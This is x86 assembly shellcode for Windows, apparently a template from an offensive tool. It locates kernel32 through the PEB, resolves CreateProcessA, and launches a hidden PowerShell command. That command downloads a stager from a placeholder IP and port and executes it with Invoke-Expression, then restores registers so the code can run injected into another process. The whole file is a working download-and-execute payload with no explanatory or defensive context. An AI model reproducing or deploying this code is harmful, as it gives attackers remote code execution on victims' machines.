section .text
global _start


_start: 

pushad
xor ecx, ecx
mul ecx
mov eax, [fs:ecx + 0x30] ; PEB offset
mov eax, [eax + 0xc]     ; LDR offset
mov esi, [eax + 0x14]    ; InMemOrderModList
lodsd                    ; 2nd module
xchg eax, esi            ; 
lodsd                    ; 3rd module
mov ebx, [eax + 0x10]    ; kernel32 base address
mov edi, [ebx + 0x3c]    ; e_lfanew offset
add edi, ebx             ; offset + base
mov edi, [edi + 0x78]    ; export table offset
add edi, ebx             ; offset + base
mov esi, [edi + 0x20]    ; namestable offset
add esi, ebx             ; offset + base
xor ecx, ecx             ; 


Get_Function:
 
inc ecx                             
lodsd                                
add eax, ebx                        
cmp dword [eax], 0x61657243          
jnz Get_Function
cmp word [eax + 0xa], 0x41737365	   
jnz Get_Function
mov esi, [edi + 0x24]                
add esi, ebx                         
mov cx, [esi + ecx * 2]             
dec ecx
mov esi, [edi + 0x1c]                
add esi, ebx                         
mov edi, [esi + ecx * 4]             
add edi, ebx                         

mov cl, 0xff

zero_loop:
push edx
loop zero_loop
mov edx,esp
call get_eip
mov ecx, eax
xor cl,cl
add ecx,cmd
xor eax,eax

push edx
push edx
push eax
push eax
push eax
push eax
push eax
push eax
push ecx
push eax
call edi
xor ecx,ecx
mov cl, 0xff
rm_loop:
pop edx
loop rm_loop
popad
ret
get_eip:
mov eax, [esp]
ret
cmd:
db "Powershell.exe -w hidden $t = (New-Object Net.WebClient).DownloadString('{HTTP}://{ip}:{port}{b52stager}');Invoke-Expression $t;"